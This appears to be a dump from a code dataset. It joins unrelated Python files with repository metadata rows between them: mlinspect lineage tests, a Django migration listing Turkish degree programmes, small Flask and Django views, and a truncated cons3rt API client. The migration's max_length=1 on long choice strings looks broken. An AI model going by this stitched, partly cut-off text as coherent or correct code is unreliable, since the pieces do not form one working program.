OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('sklearn.linear_model._logistic',
'LogisticRegression')),
DagNodeDetails('Logistic Regression', []),
OptionalCodeInfo(CodeReference(11, 6, 11, 26), 'LogisticRegression()'))
expected_dag.add_edge(expected_train_data, expected_estimator)
expected_dag.add_edge(expected_train_labels, expected_estimator)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([0]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([1]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_estimator]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
def test_keras_wrapper():
"""
Tests whether the monkey patching of ('tensorflow.python.keras.wrappers.scikit_learn', 'KerasClassifier') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from tensorflow.keras.wrappers.scikit_learn import KerasClassifier
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential
from tensorflow.python.keras.optimizer_v2.gradient_descent import SGD
import numpy as np
df = pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], 'target': ['no', 'no', 'yes', 'yes']})
train = StandardScaler().fit_transform(df[['A', 'B']])
target = OneHotEncoder(sparse=False).fit_transform(df[['target']])
def create_model(input_dim):
clf = Sequential()
clf.add(Dense(9, activation='relu', input_dim=input_dim))
clf.add(Dense(9, activation='relu'))
clf.add(Dense(2, activation='softmax'))
clf.compile(loss='categorical_crossentropy', optimizer=SGD(), metrics=["accuracy"])
return clf
clf = KerasClassifier(build_fn=create_model, epochs=2, batch_size=1, verbose=0, input_dim=2)
clf.fit(train, target)
test_predict = clf.predict([[0., 0.], [0.6, 0.6]])
assert test_predict.shape == (2,)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(9, 5, 9, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(11, 8, 11, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(11, 39, 11, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 12),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(12, 51, 12, 65), "df[['target']]"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 12),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(12, 9, 12, 36), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_classifier = DagNode(7,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Neural Network', []),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_train_data, expected_classifier)
expected_dag.add_edge(expected_train_labels, expected_classifier)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1., 0.]), {LineageId(0, 0)}],
[numpy.array([1., 0.]), {LineageId(0, 1)}],
[numpy.array([0., 1.]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_classifier]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
| 67.088931 | 120 | 0.537222 | 6,292 | 70,913 | 5.790051 | 0.042435 | 0.006752 | 0.024594 | 0.031621 | 0.938569 | 0.92844 | 0.912437 | 0.896901 | 0.87022 | 0.859954 | 0 | 0.039345 | 0.350556 | 70,913 | 1,056 | 121 | 67.152462 | 0.751705 | 0.02276 | 0 | 0.814525 | 0 | 0.023464 | 0.240454 | 0.058536 | 0 | 0 | 0 | 0.002841 | 0.049162 | 1 | 0.014525 | false | 0 | 0.068156 | 0 | 0.083799 | 0.003352 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68b785c97b08e1f1f15e545249430ec69a0eded2 | 92 | py | Python | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | 2 | 2019-02-10T04:59:52.000Z | 2019-02-11T04:09:52.000Z | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | null | null | null | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | 2 | 2019-05-17T21:56:35.000Z | 2021-03-24T06:56:18.000Z | from .path.join_with_slash import *
from .path.full_path import *
from .path.split import *
| 23 | 35 | 0.771739 | 15 | 92 | 4.533333 | 0.533333 | 0.352941 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 92 | 3 | 36 | 30.666667 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68f873f2bf3c958e4267ded7737b6fd020f08ef5 | 7,828 | py | Python | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 220 | 2018-04-18T06:11:24.000Z | 2022-02-14T15:35:50.000Z | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 19 | 2018-04-20T18:48:32.000Z | 2022-03-11T23:43:31.000Z | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 43 | 2018-04-20T18:27:08.000Z | 2021-11-05T01:34:48.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-27 16:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20180224_1926'),
]
operations = [
migrations.AddField(
model_name='user',
name='major',
field=models.CharField(blank=True, choices=[(b'Akt\xc3\xbcerya', b'Akt\xc3\xbcerya'), (b'Alman Dili ve Edebiyat\xc4\xb1', b'Alman Dili ve Edebiyat\xc4\xb1'), (b'Almanca \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Almanca \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Bankac\xc4\xb1l\xc4\xb1k', b'Bankac\xc4\xb1l\xc4\xb1k'), (b'Beslenme ve Diyetetik', b'Beslenme ve Diyetetik'), (b'Bilgi ve Belge Y\xc3\x96netimi', b'Bilgi ve Belge Y\xc3\x96netimi'), (b'Bilgisayar M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Bilgisayar M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Bilgisayar ve \xc3\x96\xc4\x9fretim Teknolojileri \xc3\x96\xc4\x9fr.', b'Bilgisayar ve \xc3\x96\xc4\x9fretim Teknolojileri \xc3\x96\xc4\x9fr.'), (b'Biyoloji', b'Biyoloji'), (b'Biyoloji \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Biyoloji \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Biyom\xc3\xbchendislik (\xc4\xb0ngilizce)', b'Biyom\xc3\xbchendislik (\xc4\xb0ngilizce)'), (b'Co\xc4\x9frafya', b'Co\xc4\x9frafya'), (b'Co\xc4\x9frafya \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Co\xc4\x9frafya \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc3\x87al\xc4\xb1\xc5\x9fma Ekonomisi ve End\xc3\xbcstri \xc4\xb0li\xc5\x9fkileri', b'\xc3\x87al\xc4\xb1\xc5\x9fma Ekonomisi ve End\xc3\xbcstri \xc4\xb0li\xc5\x9fkileri'), (b'\xc3\x87evre M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'\xc3\x87evre M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Di\xc5\x9f Hekimli\xc4\x9fi (\xc4\xb0ngilizce)', b'Di\xc5\x9f Hekimli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Ebelik', b'Ebelik'), (b'Eczac\xc4\xb1l\xc4\xb1k', b'Eczac\xc4\xb1l\xc4\xb1k'), (b'Ekonometri', b'Ekonometri'), (b'Elektrik-Elektronik M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Elektrik-Elektronik M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'End\xc3\xbcstri M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'End\xc3\xbcstri M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'End\xc3\xbcstri \xc3\xbcr\xc3\xbcnleri Tasar\xc4\xb1m\xc4\xb1', b'End\xc3\xbcstri \xc3\xbcr\xc3\xbcnleri Tasar\xc4\xb1m\xc4\xb1'), (b'Fen Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Fen Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Fizik', b'Fizik'), (b'Fizik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Fizik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Fizyoterapi ve Rehabilitasyon', b'Fizyoterapi ve Rehabilitasyon'), (b'Foto\xc4\x9fraf', b'Foto\xc4\x9fraf'), (b'Frans\xc4\xb1zca \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Frans\xc4\xb1zca \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Gazetecilik', b'Gazetecilik'), (b'Geleneksek T\xc3\xbcrk Sanatlar\xc4\xb1', b'Geleneksek T\xc3\xbcrk Sanatlar\xc4\xb1'), (b'Grafik', b'Grafik'), (b'Halkla \xc4\xb0li\xc5\x9fkiler ve Tan\xc4\xb1t\xc4\xb1m', b'Halkla \xc4\xb0li\xc5\x9fkiler ve Tan\xc4\xb1t\xc4\xb1m'), (b'Hem\xc5\x9firelik', b'Hem\xc5\x9firelik'), (b'Heykel', b'Heykel'), (b'Hukuk', b'Hukuk'), (b'\xc4\xb0ktisat', b'\xc4\xb0ktisat'), (b'\xc4\xb0ktisat (\xc4\xb0ngilizce)', b'\xc4\xb0ktisat (\xc4\xb0ngilizce)'), (b'\xc4\xb0lahiyat (\xc4\xb0ngilizce)', b'\xc4\xb0lahiyat (\xc4\xb0ngilizce)'), (b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi (\xc4\xb0\xc3\x96)', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi (\xc4\xb0\xc3\x96)'), (b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0ngilizce \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0ngilizce \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0\xc3\xa7mimarl\xc4\xb1k', b'\xc4\xb0\xc3\xa7mimarl\xc4\xb1k'), (b'\xc4\xb0\xc5\x9fletme', b'\xc4\xb0\xc5\x9fletme'), (b'\xc4\xb0\xc5\x9fletme (Almanca)', b'\xc4\xb0\xc5\x9fletme (Almanca)'), (b'\xc4\xb0\xc5\x9fletme (\xc4\xb0ngilizce)', b'\xc4\xb0\xc5\x9fletme (\xc4\xb0ngilizce)'), (b'\xc4\xb0\xc5\x9fletme Enformati\xc4\x9fi (Almanca)', b'\xc4\xb0\xc5\x9fletme Enformati\xc4\x9fi (Almanca)'), (b'\xc4\xb0\xc5\x9fletme Fak\xc3\xbcltesi', b'\xc4\xb0\xc5\x9fletme Fak\xc3\xbcltesi'), (b'Kamu Y\xc3\x96netimi (Frans\xc4\xb1zca)', b'Kamu Y\xc3\x96netimi (Frans\xc4\xb1zca)'), (b'Kimya', b'Kimya'), (b'Kimya M\xc3\xbchendisli\xc4\x9fi (%30 \xc4\xb0ngilizce)', b'Kimya M\xc3\xbchendisli\xc4\x9fi (%30 \xc4\xb0ngilizce)'), (b'Kimya \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Kimya \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Makine M\xc3\xbchendisli\xc4\x9fi', b'Makine M\xc3\xbchendisli\xc4\x9fi'), (b'Makine M\xc3\xbchendisli\xc4\x9fi (M.T.O.K.)', b'Makine M\xc3\xbchendisli\xc4\x9fi (M.T.O.K.)'), (b'Makine M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Makine M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Maliye', b'Maliye'), (b'Matematik', b'Matematik'), (b'Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Mekatronik M\xc3\xbchendisli\xc4\x9fi', b'Mekatronik M\xc3\xbchendisli\xc4\x9fi'), (b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi', b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi'), (b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'M\xc3\xbczik', b'M\xc3\xbczik'), (b'Okul \xc3\x96ncesi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Okul \xc3\x96ncesi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Radyo, Televizyon ve Sinema', b'Radyo, Televizyon ve Sinema'), (b'Rehberlik ve Psikolojik Dan\xc4\xb1\xc5\x9fmanl\xc4\xb1k', b'Rehberlik ve Psikolojik Dan\xc4\xb1\xc5\x9fmanl\xc4\xb1k'), (b'Resim', b'Resim'), (b'Sanat Tarihi', b'Sanat Tarihi'), (b'Sa\xc4\x9fl\xc4\xb1k Y\xc3\x96netimi', b'Sa\xc4\x9fl\xc4\xb1k Y\xc3\x96netimi'), (b'Seramik Cam', b'Seramik Cam'), (b'Sermaye Piyasas\xc4\xb1', b'Sermaye Piyasas\xc4\xb1'), (b'Sigortac\xc4\xb1l\xc4\xb1k', b'Sigortac\xc4\xb1l\xc4\xb1k'), (b'Sinema ve Televizyon', b'Sinema ve Televizyon'), (b'Siyaset Bilimi ve Uluslararas\xc4\xb1 \xc4\xb0li\xc5\x9fkiler (\xc4\xb0ngilizce)', b'Siyaset Bilimi ve Uluslararas\xc4\xb1 \xc4\xb0li\xc5\x9fkiler (\xc4\xb0ngilizce)'), (b'Sosyal Bilgiler \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Sosyal Bilgiler \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Sosyoloji (\xc4\xb0ngilizce)', b'Sosyoloji (\xc4\xb0ngilizce)'), (b'Spor Y\xc3\x96neticili\xc4\x9fi', b'Spor Y\xc3\x96neticili\xc4\x9fi'), (b'S\xc4\xb1n\xc4\xb1f \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'S\xc4\xb1n\xc4\xb1f \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Tak\xc4\xb1 Tasar\xc4\xb1m\xc4\xb1', b'Tak\xc4\xb1 Tasar\xc4\xb1m\xc4\xb1'), (b'Tarih', b'Tarih'), (b'Tarih \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Tarih \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Tekstil', b'Tekstil'), (b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1', b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1'), (b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1 \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1 \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'T\xc3\xbcrk\xc3\xa7e \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'T\xc3\xbcrk\xc3\xa7e \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'T\xc4\xb1p (\xc4\xb0ngilizce)', b'T\xc4\xb1p (\xc4\xb0ngilizce)'), (b'Zihin Engelliler \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Zihin Engelliler \xc3\x96\xc4\x9fretmenli\xc4\x9fi')], max_length=1, null=True),
),
]
| 372.761905 | 7,434 | 0.722024 | 1,331 | 7,828 | 4.238918 | 0.138993 | 0.081886 | 0.076569 | 0.134704 | 0.906416 | 0.855548 | 0.835165 | 0.785005 | 0.752393 | 0.622297 | 0 | 0.114435 | 0.068983 | 7,828 | 20 | 7,435 | 391.4 | 0.659715 | 0.008687 | 0 | 0 | 1 | 1.384615 | 0.819518 | 0.404409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
6bf242241d374474ec99a7b7e727b86abf2bccd3 | 96 | py | Python | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | from . import aicos_monitor
@aicos_monitor.route('/')
def home():
return "Hello Monitor here!" | 19.2 | 29 | 0.729167 | 13 | 96 | 5.230769 | 0.769231 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 96 | 5 | 29 | 19.2 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d485d30626e513b2c57a7fd0fae47a06817e2d94 | 119 | py | Python | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | 7 | 2020-02-12T02:58:52.000Z | 2022-02-10T08:52:44.000Z | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | from django.shortcuts import render
def about_irekua(request):
return render(request, 'selia_about/irekua.html')
| 19.833333 | 53 | 0.781513 | 16 | 119 | 5.6875 | 0.75 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12605 | 119 | 5 | 54 | 23.8 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0.193277 | 0.193277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
00fa435090399be7db475a50ddde98a9167cb613 | 166,203 | py | Python | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
"""
Copyright 2020 Jackpine Technologies Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
cons3rt - Copyright Jackpine Technologies Corp.
NOTE: This file is auto-generated. Do not edit the file manually.
"""
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from cons3rt.api_client import ApiClient
from cons3rt.exceptions import (
ApiTypeError,
ApiValueError
)
__author__ = 'Jackpine Technologies Corporation'
__copyright__ = 'Copyright 2020, Jackpine Technologies Corporation'
__license__ = 'Apache 2.0',
__version__ = '1.0.0'
__maintainer__ = 'API Support'
__email__ = 'support@cons3rt.com'
class DeploymentRunsApi(object):
"""NOTE: This class is auto-generated. Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_category_to_deployment_run(self, id, runid, **kwargs): # noqa: E501
"""Assign Category to Run # noqa: E501
Assigns the Category as a filter tag to the provided Deployment Run.<br> <br> Altering the Category will affect future Run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_category_to_deployment_run(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to assign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_category_to_deployment_run_with_http_info(id, runid, **kwargs) # noqa: E501
def add_category_to_deployment_run_with_http_info(self, id, runid, **kwargs): # noqa: E501
"""Assign Category to Run # noqa: E501
Assigns the Category as a filter tag to the provided Deployment Run.<br> <br> Altering the Category will affect future Run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_category_to_deployment_run_with_http_info(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to assign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
